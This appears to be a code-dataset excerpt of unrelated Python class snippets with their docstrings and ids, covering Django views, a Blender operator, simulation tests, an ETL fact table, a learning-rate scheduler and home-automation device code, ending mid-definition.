class purchase_view_details(template): <NEW_LINE> <INDENT> def get(self, request, transaction_number): <NEW_LINE> <INDENT> r = requests.get(url = PURCHASE_TRANSACTION, params = {'transaction_number':transaction_number}) <NEW_LINE> if r.status_code is 200: <NEW_LINE> <INDENT> json_data = r.json() <NEW_LINE> if hasUpdatePurchaseRecordAccess(request.user): <NEW_LINE> <INDENT> item_list = json.loads(requests.get(PURCHASE_ITEM_LIST).text) <NEW_LINE> uom = json.loads(requests.get(UNIT_OF_MEASURE).text) <NEW_LINE> po_header_statuses = json.loads(requests.get(PURCHASE_ORDER_HEADER_STATUS).text) <NEW_LINE> po_type = json.loads(requests.get(PURCHASE_ORDER_TYPE).text) <NEW_LINE> supplier_list = json.loads(requests.get(SUPPLIER_LIST).text) <NEW_LINE> if 'transaction_date' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> json_data['purchase_trx_details'][0]['transaction_date'] = json_data['purchase_trx_details'][0]['transaction_date'].split(' ')[0] <NEW_LINE> <DEDENT> if 'receipt_details' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> for row in json_data['purchase_trx_details'][0]['receipt_details']: <NEW_LINE> <INDENT> if row['challan_date']: <NEW_LINE> <INDENT> row['challan_date'] = row['challan_date'].split(' ')[0] <NEW_LINE> <DEDENT> if row['receipt_date']: <NEW_LINE> <INDENT> row['receipt_date'] = row['receipt_date'].split(' ')[0] <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> data= {'user' : request.user.username, 'po_type' : po_type['purchaseOrderType'], 'supplier_list' : supplier_list['supplierLists'], 'item_list' : item_list['itemDetailsList'], 'uom' : uom['UnitOfMeasure'], 'header_status' : po_header_statuses['purchaseOrderHeaderStatus'], 'details' : json_data['purchase_trx_details'][0] } <NEW_LINE> if json_data['purchase_trx_details'][0]['order_status'] == 'OPEN': <NEW_LINE> <INDENT> template = jinja_template.get_template('purchase/purchase-line-update.html') <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> template = 
jinja_template.get_template('purchase/purchase-line-view.html') <NEW_LINE> <DEDENT> return HttpResponse(template.render(request, data=data)) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if 'transaction_date' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> json_data['purchase_trx_details'][0]['transaction_date'] = json_data['purchase_trx_details'][0]['transaction_date'].split(' ')[0] <NEW_LINE> <DEDENT> if 'receipt_details' in json_data['purchase_trx_details'][0]: <NEW_LINE> <INDENT> for row in json_data['purchase_trx_details'][0]['receipt_details']: <NEW_LINE> <INDENT> row['receipt_date'] = row['receipt_date'].split(' ')[0] <NEW_LINE> row['challan_date'] = row['challan_date'].split(' ')[0] <NEW_LINE> <DEDENT> <DEDENT> template = jinja_template.get_template('purchase/purchase-line-view.html') <NEW_LINE> return HttpResponse(template.render(request, data=json_data['purchase_trx_details'][0])) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> template = jinja_template.get_template('internal_server_error.html') <NEW_LINE> return HttpResponse(template.render(request)) | classdocs | 62598fab851cf427c66b825f |
class NODE_OT_template_add(Operator): <NEW_LINE> <INDENT> bl_idname = "node.template_add" <NEW_LINE> bl_label = "Add node group template" <NEW_LINE> bl_description = "Add node group template" <NEW_LINE> bl_options = {'REGISTER', 'UNDO'} <NEW_LINE> filepath: StringProperty( subtype='FILE_PATH', ) <NEW_LINE> group_name: StringProperty( ) <NEW_LINE> def execute(self, context): <NEW_LINE> <INDENT> node_template_add(context, self.filepath, self.group_name, True, self.report) <NEW_LINE> return {'FINISHED'} <NEW_LINE> <DEDENT> def invoke(self, context, event): <NEW_LINE> <INDENT> node_template_add(context, self.filepath, self.group_name, event.shift, self.report) <NEW_LINE> return {'FINISHED'} | Add a node template | 62598fab7047854f4633f37d |
class RegisterView(View): <NEW_LINE> <INDENT> def get(self,requset): <NEW_LINE> <INDENT> return render(requset,"register.html") <NEW_LINE> <DEDENT> def post(self,request): <NEW_LINE> <INDENT> user_name = request.POST.get("user_name") <NEW_LINE> password = request.POST.get("pwd") <NEW_LINE> email = request.POST.get("email") <NEW_LINE> allow = request.POST.get("allow") <NEW_LINE> if not all([user_name,password,email]): <NEW_LINE> <INDENT> return redirect(reverse("users:register")) <NEW_LINE> <DEDENT> if not re.match(r"^[a-z0-9][\w\.\-]*@[a-z0-9\-]+(\.[a-z]{2,5}){1,2}$", email): <NEW_LINE> <INDENT> return render(request, 'register.html', {'errmsg':'邮箱格式不正确'}) <NEW_LINE> <DEDENT> if allow != "on": <NEW_LINE> <INDENT> return render(request, "register.html", {"errmsg":"没有勾选用户协议"}) <NEW_LINE> <DEDENT> try: <NEW_LINE> <INDENT> user = User.objects.create_user(user_name, email, password) <NEW_LINE> <DEDENT> except IntegrityError: <NEW_LINE> <INDENT> return render(request, 'register.html', {'errmsg': '用户名已存在'}) <NEW_LINE> <DEDENT> user.is_active = False <NEW_LINE> user.save() <NEW_LINE> token = user.generate_active_token() <NEW_LINE> send_active_email.delay(email, user_name, token) <NEW_LINE> return redirect(reverse('goods:index')) | 类视图:处理注册 | 62598fab2ae34c7f260ab085 |
class FactorMixture(Factor): <NEW_LINE> <INDENT> def accept(self, visitor, *args, **kwargs): <NEW_LINE> <INDENT> return visitor.visit_factor_mixture(self, *args, **kwargs) <NEW_LINE> <DEDENT> def __init__(self, x, factors, _lambda): <NEW_LINE> <INDENT> self.x = x <NEW_LINE> self.factors = list(factors) <NEW_LINE> self._lambda = _lambda <NEW_LINE> <DEDENT> def neighbours(self): <NEW_LINE> <INDENT> from itertools import chain <NEW_LINE> result = set() <NEW_LINE> for f in self.factors: <NEW_LINE> <INDENT> for n in f.neighbours(): <NEW_LINE> <INDENT> result.add(n) <NEW_LINE> <DEDENT> <DEDENT> result.add(self._lambda) <NEW_LINE> return result <NEW_LINE> <DEDENT> @assert_result_finite <NEW_LINE> def calculate_update_for(self, v, var_dists): <NEW_LINE> <INDENT> if self.x == v: <NEW_LINE> <INDENT> _lambda = var_dists[self._lambda].get_expectation() <NEW_LINE> y = numpy.array([f.calculate_update_for(v, var_dists) for f in self.factors]) <NEW_LINE> return _lambda * y <NEW_LINE> <DEDENT> if self._lambda == v: <NEW_LINE> <INDENT> log_likelihoods = numpy.array( [f.log_likelihood(var_dists) for f in self.factors]) <NEW_LINE> return log_likelihoods <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> _lambda = var_dists[self._lambda].get_expectation() <NEW_LINE> for f, p in zip(self.factors, _lambda): <NEW_LINE> <INDENT> if v in f.neighbours(): <NEW_LINE> <INDENT> return p * f.calculate_update_for(v, var_dists) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> raise RuntimeError( 'Neighbour, v, not known by factor. Cannot calculate an update for unknown vertex.') <NEW_LINE> <DEDENT> @assert_result_finite <NEW_LINE> def log_likelihood(self, var_dists): <NEW_LINE> <INDENT> _lambda = var_dists[self._lambda].get_expectation() <NEW_LINE> log_likelihoods = numpy.array( [f.log_likelihood(var_dists) for f in self.factors]) <NEW_LINE> return numpy.dot(_lambda, log_likelihoods) | A factor in a factor graph that models a mixture of several other factors. | 62598fab4f6381625f199490 |
class TestPersonAgent(unittest.TestCase): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> logging.basicConfig(format="%(levelname)s %(asctime)s: %(message)s", level=logging.DEBUG) <NEW_LINE> self.sim = Simulation(number_of_floors=10) <NEW_LINE> self.ctrl = ElevatorBank(self.sim) <NEW_LINE> self.first_elevator = self.ctrl.add_elevator(capacity=1) <NEW_LINE> self.sim.elevator_banks.append(self.ctrl) <NEW_LINE> self.person = Person(self.sim) <NEW_LINE> self.person.schedule.add_event(timedelta(hours=7), self.sim.building.floors[6]) <NEW_LINE> self.person.schedule.add_event(timedelta(hours=12), self.sim.building.floors[5]) <NEW_LINE> self.person.schedule.add_event(timedelta(hours=16), self.sim.building.floors[0]) <NEW_LINE> self.sim.people.append(self.person) <NEW_LINE> <DEDENT> def tearDown(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def test_elevator_capacity_skip(self): <NEW_LINE> <INDENT> person2 = Person(self.sim) <NEW_LINE> person2.schedule.add_event(timedelta(hours=7), self.sim.building.floors[3]) <NEW_LINE> self.sim.people.append(person2) <NEW_LINE> num_tests = 1 <NEW_LINE> def count_floor(event): <NEW_LINE> <INDENT> nonlocal num_tests <NEW_LINE> num_tests += 1 <NEW_LINE> <DEDENT> person2.register_event_callback("floor_reached", count_floor) <NEW_LINE> until_time = timedelta(hours=8).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(4, num_tests) <NEW_LINE> <DEDENT> def test_arrives_at_work_level(self): <NEW_LINE> <INDENT> until_time = timedelta(hours=8).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(self.first_elevator.location, self.person.schedule.events[0].location) <NEW_LINE> self.assertEqual(self.person.location, self.person.schedule.events[0].location) <NEW_LINE> <DEDENT> def test_arrives_at_lunch_level(self): <NEW_LINE> <INDENT> until_time = timedelta(hours=13).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> 
self.assertEqual(self.first_elevator.location, self.person.schedule.events[1].location) <NEW_LINE> self.assertEqual(self.person.location, self.person.schedule.events[1].location) <NEW_LINE> <DEDENT> def test_arrives_work_done_level(self): <NEW_LINE> <INDENT> until_time = timedelta(hours=17).total_seconds() <NEW_LINE> self.sim.env.run(until=until_time) <NEW_LINE> self.assertEqual(self.first_elevator.location, self.person.schedule.events[2].location) <NEW_LINE> self.assertEqual(self.person.location, self.person.schedule.events[2].location) | Test case docstring. | 62598fab21bff66bcd722c0a |
class Named(type): <NEW_LINE> <INDENT> _names = {} <NEW_LINE> def __new__(metacls, name, bases, attrs): <NEW_LINE> <INDENT> name = attrs['name'] <NEW_LINE> iface = attrs['iface'] <NEW_LINE> cls = metacls._names.setdefault(name, {}).get(iface) <NEW_LINE> if cls is None: <NEW_LINE> <INDENT> cls = super(Named, metacls).__new__(metacls, name, bases, attrs) <NEW_LINE> metacls._names[name][iface] = cls <NEW_LINE> <DEDENT> return cls <NEW_LINE> <DEDENT> def __call__(cls): <NEW_LINE> <INDENT> return injector.get_instance(cls.iface, name=cls.name) | Metaclass to implement named lookup of dependencies | 62598faba219f33f346c67ba |
class RNet(nn.Module): <NEW_LINE> <INDENT> def __init__(self,is_train=False, use_cuda=True): <NEW_LINE> <INDENT> super(RNet, self).__init__() <NEW_LINE> self.is_train = is_train <NEW_LINE> self.use_cuda = use_cuda <NEW_LINE> self.pre_layer = nn.Sequential( nn.Conv2d(3, 28, kernel_size=3, stride=1), nn.PReLU(), nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True), nn.Conv2d(28, 48, kernel_size=3, stride=1), nn.PReLU(), nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True), nn.Conv2d(48, 64, kernel_size=2, stride=1), nn.PReLU() ) <NEW_LINE> self.conv4 = nn.Linear(64*3*3, 128) <NEW_LINE> self.prelu4 = nn.PReLU() <NEW_LINE> self.conv5_1 = nn.Linear(128, 1) <NEW_LINE> self.conv5_2 = nn.Linear(128, 4) <NEW_LINE> self.conv5_3 = nn.Linear(128, 10) <NEW_LINE> self.apply(weights_init) <NEW_LINE> <DEDENT> def forward(self, x): <NEW_LINE> <INDENT> x = self.pre_layer(x) <NEW_LINE> x = x.view(x.size(0), -1) <NEW_LINE> x = self.conv4(x) <NEW_LINE> x = self.prelu4(x) <NEW_LINE> det = torch.sigmoid(self.conv5_1(x)) <NEW_LINE> box = self.conv5_2(x) <NEW_LINE> if self.is_train is True: <NEW_LINE> <INDENT> return det, box <NEW_LINE> <DEDENT> return det, box | RNet | 62598fab435de62698e9bd9a |
class FilterWordsPipeline(object): <NEW_LINE> <INDENT> words_to_filter = ['politics', 'religion'] <NEW_LINE> def process_item(self, item, spider): <NEW_LINE> <INDENT> if re.match(r'^.*((\))|(\()|(船只)|(沙箱)|(规范)|(信条)|(维基)|(名片)|(版权)|(军备)|(药品)|(百科)|(严肃)|(方针)|(管理)|(申请)|(指南)|(/)|(\.\.\.)|(的)|(第[一二三四五六七八九十])).*$', item['name']): <NEW_LINE> <INDENT> raise DropItem("Contains forbidden word: %s" % word) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return item | A pipeline for filtering out items which contain certain words in their
description | 62598fab4428ac0f6e6584c8 |
class PotentiallyInvisibleTab(WaitTab): <NEW_LINE> <INDENT> def select(self): <NEW_LINE> <INDENT> if not self.is_displayed: <NEW_LINE> <INDENT> self.logger.info("Tab not present and ignoring turned on - not touching the tab.") <NEW_LINE> return <NEW_LINE> <DEDENT> return super(PotentiallyInvisibleTab, self).select() | Tab, that can be potentially invisible. | 62598fab2c8b7c6e89bd3769 |
class DecoupledFactTable(pygrametl.parallel.Decoupled): <NEW_LINE> <INDENT> def __init__(self, facttbl, returnvalues=True, consumes=(), attstoconsume=(), batchsize=500, queuesize=200): <NEW_LINE> <INDENT> pygrametl.parallel.Decoupled.__init__( self, facttbl, returnvalues, consumes, tuple([(0, a) for a in attstoconsume]), batchsize, queuesize, False) <NEW_LINE> if facttbl in pygrametl._alltables: <NEW_LINE> <INDENT> pygrametl._alltables.remove(facttbl) <NEW_LINE> <DEDENT> pygrametl._alltables.append(self) <NEW_LINE> <DEDENT> def insert(self, row, namemapping={}): <NEW_LINE> <INDENT> return self._enqueue('insert', row, namemapping) <NEW_LINE> <DEDENT> def endload(self): <NEW_LINE> <INDENT> self._enqueuenoreturn('endload') <NEW_LINE> self._endbatch() <NEW_LINE> self._join() <NEW_LINE> return None <NEW_LINE> <DEDENT> def lookup(self, row, namemapping={}): <NEW_LINE> <INDENT> if hasattr(self._obj, 'lookup'): <NEW_LINE> <INDENT> return self._enqueue('lookup', row, namemapping) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise AttributeError('The object does not support lookup') <NEW_LINE> <DEDENT> <DEDENT> def ensure(self, row, namemapping={}): <NEW_LINE> <INDENT> if hasattr(self._obj, 'ensure'): <NEW_LINE> <INDENT> return self._enqueue('ensure', row, namemapping) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> raise AttributeError('The object does not support ensure') | A FactTable-like class that enables parallelism by executing all
operations on a given FactTable in a separate, dedicated process
(that FactTable is said to be "decoupled"). | 62598fab32920d7e50bc5ff9 |
class Point: <NEW_LINE> <INDENT> def __init__(self, pointname, x, y, h): <NEW_LINE> <INDENT> self.PointName = pointname <NEW_LINE> self.X = x <NEW_LINE> self.Y = y <NEW_LINE> self.H = h <NEW_LINE> <DEDENT> def Cal_Distans(self, x0, y0): <NEW_LINE> <INDENT> d = math.sqrt(math.pow(x0-self.X, 2)+math.pow(y0-self.Y, 2)) <NEW_LINE> return d | 包含 点名 数学坐标X 数学坐标Y 高程(z)H | 62598fabf548e778e596b548 |
class EditMirror9Test(BaseTest): <NEW_LINE> <INDENT> fixtureCmds = ["aptly mirror create -keyring=aptlytest.gpg mirror9 http://pkg.jenkins-ci.org/debian-stable binary/"] <NEW_LINE> fixtureGpg = True <NEW_LINE> runCmd = "aptly mirror edit -with-udebs mirror9" <NEW_LINE> expectedCode = 1 | edit mirror: flat mirror with udebs | 62598fab498bea3a75a57ac2 |
class Testwhat_ext(UnitTestBase): <NEW_LINE> <INDENT> def get_ext_dir(self): <NEW_LINE> <INDENT> return os.path.join(self.datadir, 'ext') <NEW_LINE> <DEDENT> def setUp(self): <NEW_LINE> <INDENT> UnitTestBase.setUp(self) <NEW_LINE> self._files = ['a.txt', 'b.html', 'c.txtl', 'español.txt'] <NEW_LINE> os.mkdir(self.get_ext_dir()) <NEW_LINE> for mem in self._files: <NEW_LINE> <INDENT> with open(os.path.join(self.get_ext_dir(), mem), 'w') as fp: <NEW_LINE> <INDENT> fp.write('lorem ipsum') <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def test_returns_extension_if_file_has_extension(self): <NEW_LINE> <INDENT> d = self.get_ext_dir() <NEW_LINE> eq_(tools.what_ext(['txt', 'html'], os.path.join(d, 'a')), 'txt') <NEW_LINE> eq_(tools.what_ext(['txt', 'html'], os.path.join(d, 'b')), 'html') <NEW_LINE> eq_(tools.what_ext(['txt', 'html'], os.path.join(d, 'español')), 'txt') <NEW_LINE> <DEDENT> def test_returns_None_if_extension_not_present(self): <NEW_LINE> <INDENT> d = self.get_ext_dir() <NEW_LINE> eq_(tools.what_ext([], os.path.join(d, 'a')), None) <NEW_LINE> eq_(tools.what_ext(['html'], os.path.join(d, 'a')), None) | tools.what_ext | 62598fabaad79263cf42e778 |
class ContractSyncronizeUnitTest(unittest.TestCase): <NEW_LINE> <INDENT> def test_syncronize_success(self): <NEW_LINE> <INDENT> my_contract = Contract("0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae") <NEW_LINE> self.assertEqual(my_contract.last_syncronization, None) <NEW_LINE> my_contract.syncronize() <NEW_LINE> self.assertNotEqual(my_contract.last_syncronization, None) <NEW_LINE> self.assertTrue(my_contract.last_syncronization < datetime.now()) <NEW_LINE> <DEDENT> def test_syncronize_when_contract_not_deployed(self): <NEW_LINE> <INDENT> my_contract = Contract() <NEW_LINE> self.assertEqual(my_contract.last_syncronization, None) <NEW_LINE> with self.assertRaises(ContractNotDeployedException): <NEW_LINE> <INDENT> my_contract.syncronize() | Tests on contracts syncronization | 62598fab10dbd63aa1c70b58 |
class pWB_shortcuts: <NEW_LINE> <INDENT> def __init__(self,parent): <NEW_LINE> <INDENT> self.back_sc = QShortcut(QKeySequence(parent.tr("Ctrl+H")),parent) <NEW_LINE> self.reload_sc = QShortcut(QKeySequence(parent.tr("F5")),parent) <NEW_LINE> self.urld_sc = QShortcut(QKeySequence(parent.tr("Ctrl+G")),parent) <NEW_LINE> self.search_sc = QShortcut(QKeySequence(parent.tr("/")),parent) <NEW_LINE> self.disable_scripts_sc = QShortcut(QKeySequence(parent.tr("Ctrl+S")), parent) <NEW_LINE> self.enable_scripts_sc = QShortcut(QKeySequence(parent.tr("Ctrl+Shift+S")), parent) | Class that holds all keyboard shortcuts for pWB | 62598fab01c39578d7f12d24 |
class New(models.Model): <NEW_LINE> <INDENT> title = models.CharField( 'Заголовок', max_length=140, unique_for_date='update' ) <NEW_LINE> description = models.TextField( 'Описание', max_length=140 ) <NEW_LINE> content = models.TextField( 'Содержание' ) <NEW_LINE> pubdate = models.DateTimeField( 'Дата публикации', auto_now_add=True ) <NEW_LINE> update = models.DateTimeField( 'Дата изменения', auto_now=True ) <NEW_LINE> status = models.BooleanField( 'Статус', default=True ) <NEW_LINE> class Meta: <NEW_LINE> <INDENT> ordering = ['-pubdate'] <NEW_LINE> verbose_name = "Новость" <NEW_LINE> verbose_name_plural = "Новости" <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return '{} - {}'.format(self.title, self.description) <NEW_LINE> <DEDENT> def get_absolute_url(self): <NEW_LINE> <INDENT> return reverse('news_detail', kwargs={'slug': self.pk}) | Model of news. | 62598fab009cb60464d014c5 |
class ModelComposition(ModelDefinition): <NEW_LINE> <INDENT> def __init__(self, kwds): <NEW_LINE> <INDENT> ModelDefinition.__init__(self, kwds) <NEW_LINE> self.description = None <NEW_LINE> self.model = [] <NEW_LINE> self.initialization = [] <NEW_LINE> self.inputlink=[] <NEW_LINE> self.outputlink=[] <NEW_LINE> self.internallink=[] <NEW_LINE> self.parametersets = {} <NEW_LINE> self.inputs=[] <NEW_LINE> self.outputs=[] <NEW_LINE> self.path = None <NEW_LINE> self.aPath=None <NEW_LINE> self.states=[] <NEW_LINE> <DEDENT> def add_description(self, description): <NEW_LINE> <INDENT> self.description = description <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return 'ModelComposition' | Formal description of a Model Composite. | 62598fab44b2445a339b6942 |
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler): <NEW_LINE> <INDENT> def handle(self): <NEW_LINE> <INDENT> self.announce = announce <NEW_LINE> data = self.request.recv(1024) <NEW_LINE> cur_thread = threading.current_thread() <NEW_LINE> if data is not None: <NEW_LINE> <INDENT> self.announce.uppercase(data.decode("utf-8") + "/n") <NEW_LINE> self.request.send(bytes("message recieved from {0}".format(cur_thread.name), 'utf-8')) <NEW_LINE> <DEDENT> self.request.close() | Echo data back in uppercase | 62598fab442bda511e95c3fc |
class Place(object): <NEW_LINE> <INDENT> def __init__(self, name, exit=None): <NEW_LINE> <INDENT> self.name = name <NEW_LINE> self.exit = exit <NEW_LINE> self.bees = [] <NEW_LINE> self.ant = None <NEW_LINE> self.entrance = None <NEW_LINE> if self.exit != None: <NEW_LINE> <INDENT> self.exit.entrance = self <NEW_LINE> <DEDENT> <DEDENT> def add_insect(self, insect): <NEW_LINE> <INDENT> if insect.is_ant: <NEW_LINE> <INDENT> if self.ant is None: <NEW_LINE> <INDENT> self.ant = insect <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if self.ant.can_contain(insect): <NEW_LINE> <INDENT> self.ant.contain_ant(insect) <NEW_LINE> <DEDENT> elif insect.can_contain(self.ant): <NEW_LINE> <INDENT> insect.contain_ant(self.ant) <NEW_LINE> self.ant = insect <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> assert self.ant is None, 'Two ants in {0}'.format(self) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.bees.append(insect) <NEW_LINE> <DEDENT> insect.place = self <NEW_LINE> <DEDENT> def remove_insect(self, insect): <NEW_LINE> <INDENT> if insect.is_ant: <NEW_LINE> <INDENT> if self.ant is insect: <NEW_LINE> <INDENT> if hasattr(self.ant, 'container') and self.ant.container: <NEW_LINE> <INDENT> self.ant = self.ant.ant <NEW_LINE> <DEDENT> elif isinstance(self.ant, QueenAnt) and self.ant.imposter == False: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.ant = None <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> if isinstance(self.ant, QueenAnt) or isinstance(insect, QueenAnt) and insect.imposter == False: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> if hasattr(self.ant, 'container') and self.ant.container and self.ant.ant is insect: <NEW_LINE> <INDENT> self.ant.ant = None <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> assert False, '{0} is not in {1}'.format(insect, self) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.bees.remove(insect) <NEW_LINE> <DEDENT> insect.place = None <NEW_LINE> <DEDENT> def __str__(self): 
<NEW_LINE> <INDENT> return self.name | A Place holds insects and has an exit to another Place. | 62598fab4f6381625f199491 |
class Writer(object): <NEW_LINE> <INDENT> def __init__(self, request): <NEW_LINE> <INDENT> self.request = request <NEW_LINE> <DEDENT> def write(self, data): <NEW_LINE> <INDENT> f = self.request.get_wfile() <NEW_LINE> self.write = f <NEW_LINE> return self.write(data) | Perform a start_response if need be when we start writing. | 62598faba8370b77170f0381 |
class UnitTestTypes(DynamicTypeEnum): <NEW_LINE> <INDENT> @staticmethod <NEW_LINE> def get_unittest_enum_class() -> List[DynamicTypeEnum]: <NEW_LINE> <INDENT> from ..project.constants import Unittest_Module_Folder <NEW_LINE> try: <NEW_LINE> <INDENT> return DynamicTypeEnum.get_dynamic_class_enum_class(Unittest_Module_Folder) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> def import_class(self): <NEW_LINE> <INDENT> return super().import_class(cls_type=UnitTestCase) | base abstract unitest enum class | 62598fab32920d7e50bc5ffa |
class Dashboard(models.Model): <NEW_LINE> <INDENT> slug = models.SlugField(unique=True) <NEW_LINE> sites = models.ManyToManyField(Site, blank=True) <NEW_LINE> def __unicode__(self): <NEW_LINE> <INDENT> return self.slug | A group of featured stuff. | 62598fab63d6d428bbee2750 |
class LearningRateSchedulerInvSqrtT(LearningRateScheduler): <NEW_LINE> <INDENT> def __init__(self, updates_per_checkpoint: int, half_life: int, warmup: int = 0) -> None: <NEW_LINE> <INDENT> super().__init__(warmup) <NEW_LINE> check_condition(updates_per_checkpoint > 0, "updates_per_checkpoint needs to be > 0.") <NEW_LINE> check_condition(half_life > 0, "half_life needs to be > 0.") <NEW_LINE> self.factor = 3. / (half_life * updates_per_checkpoint) <NEW_LINE> self.t_last_log = -1 <NEW_LINE> self.log_every_t = int(half_life * updates_per_checkpoint) <NEW_LINE> <DEDENT> def __call__(self, num_updates: int): <NEW_LINE> <INDENT> lr = min(self.base_lr / sqrt(1 + num_updates * self.factor), self._warmup(num_updates) if self.warmup > 0 else C.LARGE_POSITIVE_VALUE) <NEW_LINE> if num_updates > self.t_last_log and num_updates % self.log_every_t == 0: <NEW_LINE> <INDENT> logger.info("Learning rate currently at %1.2e", lr) <NEW_LINE> self.t_last_log = num_updates <NEW_LINE> <DEDENT> return lr | Learning rate schedule: lr / sqrt(1 + factor * t).
Note: The factor is calculated from the half life of the learning rate.
:param updates_per_checkpoint: Number of batches between checkpoints.
:param half_life: Half life of the learning rate in number of checkpoints.
:param warmup: Number of (linear) learning rate increases to warm-up. | 62598fab99cbb53fe6830e7d |
class StartDownload(BackendMessage): <NEW_LINE> <INDENT> def __init__(self, id_): <NEW_LINE> <INDENT> self.id = id_ <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return BackendMessage.__repr__(self) + (", id: %s" % self.id) | Start downloading an item.
| 62598fabac7a0e7691f724af |
class GatherRemoteMongoCoredumps(PowercycleCommand): <NEW_LINE> <INDENT> COMMAND = "gatherRemoteMongoCoredumps" <NEW_LINE> def execute(self) -> None: <NEW_LINE> <INDENT> aws_ec2_yml = self.expansions["aws_ec2_yml"] <NEW_LINE> if os.path.exists(aws_ec2_yml) and os.path.isfile( aws_ec2_yml) or "ec2_ssh_failure" in self.expansions: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> remote_dir = "." if "remote_dir" not in self.expansions else self.expansions["remote_dir"] <NEW_LINE> cmds = "core_files=$(/usr/bin/find -H . ( -name '*.core' -o -name '*.mdmp' ) 2> /dev/null)" <NEW_LINE> cmds = f"{cmds}; if [ -z \"$core_files\" ]; then exit 0; fi" <NEW_LINE> cmds = f"{cmds}; echo Found remote core files $core_files, moving to $(pwd)" <NEW_LINE> cmds = f"{cmds}; for core_file in $core_files" <NEW_LINE> cmds = f"{cmds}; do base_name=$(echo $core_file | sed 's/.*///')" <NEW_LINE> cmds = f"{cmds}; if [ ! -f $base_name ]; then mv $core_file .; fi" <NEW_LINE> cmds = f"{cmds}; done" <NEW_LINE> self.remote_op.operation(SSHOperation.SHELL, cmds, remote_dir) | Gather Remote Mongo Coredumps. | 62598fab66673b3332c30371 |
class PrincipalError(FaraException): <NEW_LINE> <INDENT> pass | Raised when there is a problem with a principal data | 62598fab7cff6e4e811b59d2 |
class Image(object): <NEW_LINE> <INDENT> def __init__(self, filepath='', url='', collection_filepath='', metadata=None): <NEW_LINE> <INDENT> self.data = None <NEW_LINE> self.filepath = filepath <NEW_LINE> self.url = url <NEW_LINE> self.collection_filepath = '' <NEW_LINE> if filepath != '': <NEW_LINE> <INDENT> with contextlib.closing(open(filepath, 'rb')) as fp: <NEW_LINE> <INDENT> self.data = fp.read() <NEW_LINE> <DEDENT> self.collection_filepath = filepath <NEW_LINE> <DEDENT> self.url = url <NEW_LINE> if self.data is None and self.url != '': <NEW_LINE> <INDENT> self.collection_filepath = os.path.basename(self.url) <NEW_LINE> <DEDENT> if collection_filepath != '': <NEW_LINE> <INDENT> self.collection_filepath = collection_filepath <NEW_LINE> <DEDENT> if self.data is None and self.url == '': <NEW_LINE> <INDENT> raise ValueError('Image object needs either data or a URL.') <NEW_LINE> <DEDENT> self.metadata = metadata <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "Image(filepath=%r, url=%r, collection_filepath=%r, metadata=%r)" % (self.filepath, self.url, self.collection_filepath, self.metadata) | Class representing an image.
Image on filesystem:
>>> from tineyeservices import Image
>>> image = Image(filepath='/path/to/image.jpg', collection_filepath='collection.jpg')
Image URL:
>>> image = Image(url='https://tineye.com/images/meloncat.jpg', collection_filepath='collection.jpg')
Image with metadata:
>>> import json
>>> metadata = json.dumps({"keywords": ["dolphin"]})
>>> image = Image(filepath='/path/to/image.jpg', metadata=metadata) | 62598fab92d797404e388b37 |
class XiaomiGenericCover(XiaomiDevice, CoverDevice): <NEW_LINE> <INDENT> def __init__(self, device, name, data_key, xiaomi_hub): <NEW_LINE> <INDENT> self._data_key = data_key <NEW_LINE> self._pos = 0 <NEW_LINE> XiaomiDevice.__init__(self, device, name, xiaomi_hub) <NEW_LINE> <DEDENT> @property <NEW_LINE> def current_cover_position(self): <NEW_LINE> <INDENT> return self._pos <NEW_LINE> <DEDENT> @property <NEW_LINE> def is_closed(self): <NEW_LINE> <INDENT> return self.current_cover_position <= 0 <NEW_LINE> <DEDENT> def close_cover(self, **kwargs): <NEW_LINE> <INDENT> self._write_to_hub(self._sid, **{self._data_key: 'close'}) <NEW_LINE> <DEDENT> def open_cover(self, **kwargs): <NEW_LINE> <INDENT> self._write_to_hub(self._sid, **{self._data_key: 'open'}) <NEW_LINE> <DEDENT> def stop_cover(self, **kwargs): <NEW_LINE> <INDENT> self._write_to_hub(self._sid, **{self._data_key: 'stop'}) <NEW_LINE> <DEDENT> def set_cover_position(self, **kwargs): <NEW_LINE> <INDENT> position = kwargs.get(ATTR_POSITION) <NEW_LINE> self._write_to_hub(self._sid, **{ATTR_CURTAIN_LEVEL: str(position)}) <NEW_LINE> <DEDENT> def parse_data(self, 